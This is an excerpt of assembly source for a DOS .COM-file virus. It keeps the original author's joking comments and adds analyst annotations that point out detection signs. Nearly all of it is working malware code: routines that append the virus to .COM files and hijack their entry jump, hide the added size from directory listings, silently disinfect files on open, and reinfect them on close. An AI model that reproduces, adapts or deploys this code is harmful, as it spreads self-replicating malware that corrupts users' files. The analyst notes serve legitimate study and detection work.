📄 mlp1307b.asm
int 21h ;Get attributes.
jnc got_attributes
retn
got_attributes:
push cx
xor cx,cx
mov ax,4301h
int 21h ;Zoink attributes.
mov ax,3D02h
mov dx,609h
pushf ;Open file in read/write mode.
push cs
call call_dos
mov bx,ax ;Handle to BX
mov ax,5700h
int 21h ;Get file date/time.
push dx
push cx
and cl,1Fh
cmp cl,0Ah
jne continue_infect
mov dx,offset exit_infect
jmp dx
continue_infect:
mov ah,3Fh
mov cx,3
mov dx,offset restore_bytes
int 21h ;Read first three bytes.
mov ax,4202h
xor dx,dx
xor cx,cx
int 21h ;Seek to EOF
sub ax,3
mov jmp_data,ax
mov ah,40h
mov dx,100h
mov cx,virussize
int 21h ;Append virus to file.
mov ax,4200h
xor dx,dx
xor cx,cx
int 21h ;Seek to start.
mov ah,40h
mov cx,3
mov dx,offset jmp_op
int 21h ;Overwrite with JMP
exit_infect:
pop cx
pop dx
and cl,0E0h
or cl,0Ah
mov ax,5701h
int 21h ;Givvit the special date/time
;already-infected type
;designation treatment..
mov ah,3Eh
pushf
push cs
call call_dos ;CL00000000SE 'r up!
mov ax,4301h
mov dx,offset filename
pop cx
int 21h ;Restore kuhl attribs..
ret
; ----------------------------------------------------------------------
; handle_stealth -- size-stealth path of the resident INT 21h code.
; Re-issues the caller's request through call_dos (defined outside this
; excerpt; presumably the saved original INT 21h vector -- confirm) and,
; when that succeeds, edits the directory-search result in the DTA so a
; marked .COM file is reported virussize bytes smaller.
; NOTE(review): the DTA offsets used below (16h time, 1Ah/1Ch size,
; 1Eh name) match the FindFirst/FindNext result layout; the dispatcher
; that routes requests here is not part of this excerpt.
; Analyst notes:
;   * Infection marker = low 5 bits of the file time equal to 0Ah
;     (seconds field reads as 20).
;   * While the code is resident, the size shown for a marked file
;     differs from the on-disk size by virussize; comparing listings
;     taken with and without the resident code exposes the difference.
; ----------------------------------------------------------------------
handle_stealth:
; Presumably removes the dispatcher's near return address -- confirm.
pop bp
popf
; pushf / push cs / near call builds an interrupt-style frame for
; call_dos, so the caller's original request is carried out first.
pushf
push cs
call call_dos
jnc handle_match_found
; Request failed (carry set): far return; the extra 2 bytes dropped are
; presumably the caller's saved flags word, so the new flags are kept.
retf 2
handle_match_found:
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp ;Push the lot.
mov ah,2Fh
int 21h ;Get DTA
push es
pop ds ;DS:BX points to DTA.
mov si,bx ;DS:SI points to DTA.
push cs
pop es
add si,1Eh ;1eh is start of filename
;within the DTA struct.
mov di,offset filename
; Copy at most 25 bytes, stopping at the terminating zero.
mov cx,25
copyloop:
lodsb
cmp al,0
je end_copy ;Copy filename to buffer.
stosb
loop copyloop
end_copy:
mov al,0
stosb ;Make it a valid ASCIIZ
;string.
; Swap segments: ES = DTA segment, DS = code segment (filename buffer).
push ds
pop es
push cs
pop ds
; DI is one past the terminator, so DI-4 is the first extension letter
; when the extension is exactly three characters long.
mov si,di
sub si,4 ;Assume extension is three
;characters.
lodsw
; Word constants 'OC'/'oc' match an extension starting "CO"/"co";
; mixed case such as "Co" is not matched.
cmp ax,'OC'
je starts_with_co
cmp ax,'oc'
jne no_handle_stealth
starts_with_co:
lodsb
cmp al,'m'
je com_file
cmp al,'M'
jne no_handle_stealth
com_file:
; Back to the DTA (DS = DTA segment, BX = DTA offset).
push es
pop ds
mov si,bx
add si,1Ch ;High word of filesize.
lodsw
cmp ax,0 ;COM file -> not bigger
;than 64 kb -> highword
;=0. Just an additional
;check. but OR AX,AX?
;Cuz n0t!
jne no_handle_stealth
mov si,bx
add si,16h ;File time.
lodsw
; Marker test: low 5 bits of the time word must be 0Ah.
and al,1Fh
cmp al,0Ah
jne no_handle_stealth
mov si,bx
add si,1Ah ;Low word of filesize.
; DI = SI so the stosw below overwrites the word that lodsw reads
; (ES and DS both hold the DTA segment at this point).
mov di,si
lodsw
sub ax,cs:virussize
; A result of exactly zero is left unpatched.
jz no_handle_stealth
stosw
no_handle_stealth:
; Restore everything saved at handle_match_found, including the flags
; returned by call_dos, and return to the original caller.
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
retf 2
; ----------------------------------------------------------------------
; file_open -- disinfect-on-access path of the resident INT 21h code.
; In:  DS:DX = ASCIIZ filename of the caller's request (per the code
;      below); presumably reached for file-open requests -- the
;      dispatcher is not part of this excerpt.
; If the name has a COM extension and the file carries the time marker
; (low 5 bits of file time = 0Ah), the last three bytes of the file are
; written back over its first three bytes and the file is truncated by
; virussize. The caller's request is then passed on through call_dos
; (defined outside this excerpt), so the caller works on the restored
; file.
; Analyst notes:
;   * The last three bytes of an infected file are the saved original
;     entry bytes (restore_bytes is the final data item before
;     endvirus).
;   * This path modifies the file on disk as a side effect of the
;     caller's request; unexpected writes to .COM files are a usable
;     monitoring signal.
; exit_disinfect is shared with file_close.
; ----------------------------------------------------------------------
file_open:
; Presumably removes the dispatcher's near return address -- confirm.
pop bp
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es ;Save some regs.
mov al,'.'
push ds
pop es
mov di,dx ;ES:DI points to filename.
; Search at most 32h bytes of the name for the dot.
mov cx,32h
repne scasb ;Scan for '.'
; DI is one past the scanned byte, i.e. the first extension character
; when a dot was found.
mov si,di
lodsw
cmp ax,'OC'
je pffff_this_is_boring
cmp ax,'oc'
je pffff_this_is_boring
mov dx,offset exit_disinfect
jmp dx
pffff_this_is_boring:
lodsb
cmp al,'m'
je try_disinfect
cmp al,'M'
jne exit_disinfect
try_disinfect:
; AX=3D02h: open for read/write. DX was reloaded only on the
; non-COM path above, so DS:DX is still the caller's filename here.
mov ax,3D02h
pushf
push cs
call call_dos ;Open file in read/write
;mode.
jc exit_disinfect
mov bx,ax ;Handle to BX.
push cs
pop ds
push cs
pop es
mov ax,5700h
int 21h ;Get file date/time.
; Marker test: only files whose time low 5 bits equal 0Ah are touched.
and cl,1Fh
cmp cl,0Ah
jne exit_disinfect
mov ax,4202h
xor dx,dx
xor cx,cx ;CWD? naaaaaaaah!
int 21h ;Seek to EOF
; AX = low word of the file size; kept on the stack for the truncation.
push ax
sub ax,3 ;Filesize-3
mov dx,ax
mov ax,4200h
mov cx,0
int 21h ;Seek to EOF-3.
; Read the three saved original bytes from the end of the file.
mov ah,3Fh
mov cx,3
mov dx,offset buf
int 21h
mov ax,4200h
xor cx,cx
xor dx,dx ;Boooooriiing.
int 21h ;Seek to BOF BOF BOF.
; Write them over the 3-byte jump at the start of the file.
mov ah,40h
mov cx,3
mov dx,offset buf
int 21h
; DX = saved file size minus virussize = original length.
pop dx
sub dx,virussize
mov ax,4200h
mov cx,0
int 21h ;Seek to EOF-virussize.
; A write of zero bytes truncates the file at the current position.
mov ah,40h
mov cx,0
int 21h ;Truncate file.
mov ah,3Eh
pushf
push cs
call call_dos ;close file.
exit_disinfect:
; Shared exit: restore the registers saved on entry.
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
; Presumably the flags word saved by the dispatcher before entry --
; confirm against the code outside this excerpt.
popf
; Carry out the caller's original request and return its result/flags.
pushf
push cs
call call_dos
retf 2
; ----------------------------------------------------------------------
; file_close -- infect-on-close path of the resident INT 21h code.
; In:  BX = file handle of the caller's request (used by the INT 2Fh
;      lookups below); presumably reached for file-close requests --
;      the dispatcher is not part of this excerpt.
; Looks up the System File Table entry for the handle, checks that the
; extension stored there is "COM" (upper case only is compared), and if
; so calls try_infect (defined outside this excerpt) with DS:SI pointing
; at the file name inside the SFT entry and ES = CS.
; Always leaves through exit_disinfect, which restores the registers and
; passes the caller's request to call_dos.
; Analyst note: use of the internal INT 2Fh AX=1220h/1216h services from
; resident code is uncommon in ordinary programs and is a useful
; behavioural indicator.
; ----------------------------------------------------------------------
file_close:
; Presumably removes the dispatcher's near return address -- confirm.
pop bp
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es ;Hmpf. I suppose nobody
;knows what subroutines
;are these days..
; AX=1220h: handle in BX -> ES:DI = pointer to its job-file-table byte.
mov ax,1220h
int 2Fh
; That byte is the SFT entry number for the handle.
mov bl,es:[di]
; AX=1216h: SFT entry number in BX -> ES:DI = address of the SFT entry.
mov ax,1216h
int 2Fh ;Awright, grabbed SFT ptr.
; BP keeps the start of the SFT entry for the filename lookup below.
mov bp,di
add di,28h ;File extension.
push es
pop ds
mov si,di
lodsw
cmp ax,'OC' ;AAARRRGGHh wibble wibble!
;I can't take much more
;of diiizzzzzzzzzzzz..
jne exit_disinfect
lodsb
cmp al,'M'
jne exit_disinfect
mov si,bp
add si,20h ;Filename.
push cs
pop es
call try_infect ;HUUUH? A SUBROUTINE?
jmp short exit_disinfect
; ----------------------------------------------------------------------
; get_random -- derive a byte from the system timer.
; In:   AH = whatever the caller left there (it is not initialised here
;       and feeds the mixing loop).
; Out:  AL = result byte (copied from DL after the loop).
; Saves and restores DX, CX and BX; flags are changed.
; ----------------------------------------------------------------------
get_random:
push dx
push cx
push bx
in al,40h ;Timer data.
; Leaves AX unchanged; only the flags are affected.
add ax,0
mov dx,0
; Seven mixing rounds.
mov cx,7
randomloop:
; The bit shifted out of AX is rotated into the low end of DX.
shl ax,1 ; Shift w/zeros fill
rcl dx,1 ; Rotate thru carry
mov bl,al
xor bl,dh
; If the XOR result has its sign bit set, perturb AL.
jns no_sign
inc al
no_sign:
loop randomloop
pop bx
mov al,dl
pop cx
pop dx
retn
; ----------------------------------------------------------------------
; Data area at the end of the body. Everything up to endvirus is part of
; what is appended to a host file, so these bytes appear at the tail of
; every infected file.
; ----------------------------------------------------------------------
; Plain-text identification string; a stable byte pattern for scanning.
anoi db '>>> A.N.O.I <<<'
; Scratch buffer for the three bytes moved by the disinfect path.
buf db 3 dup (0)
; Body length in bytes; the label start lies outside this excerpt.
virussize dw (endvirus-start)
; NOTE(review): no use of parasize or something is visible in this
; excerpt -- purpose to be confirmed against the rest of the file.
parasize dw 'd'
something db ' '
db ' '
db ' '
; Name buffer filled by handle_stealth and used as the path for the
; attribute call at the end of the infection routine.
filename db 12 dup (0)
; Three-byte near JMP (opcode 0E9h + 16-bit displacement) written over
; the start of a host file; jmp_data is set to file length minus 3.
jmp_op db 0E9h
jmp_data dw 0
; Saved first three bytes of the host. The initial values are
; NOP / INT 20h; they are the last three bytes before endvirus.
restore_bytes db 90h
db 0CDh, 20h
endvirus:
end start